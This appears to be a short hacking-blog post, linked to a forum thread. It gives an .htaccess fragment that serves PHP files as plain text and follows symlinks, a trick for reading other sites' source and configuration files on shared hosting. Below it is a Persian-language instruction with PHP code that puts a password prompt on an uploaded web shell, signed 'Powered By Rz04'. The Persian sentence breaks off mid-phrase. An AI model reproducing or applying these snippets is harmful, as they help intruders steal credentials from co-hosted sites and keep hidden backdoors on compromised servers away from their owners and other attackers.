Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
pass gozashtan ro shell
http://ashiyane.org/forums/showthread.php?t=28774&page=6
فقط لازمه این کد رو به اول شل ( بعد از
$auth = 1;
$name='username';
$pass='password';
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
{
header('WWW-Authenticate: Basic realm="Password Protected!!!!!!"');
header('HTTP/1.0 401 Unauthorized');
exit("Powered By Rz04");
}
No comments:
Post a Comment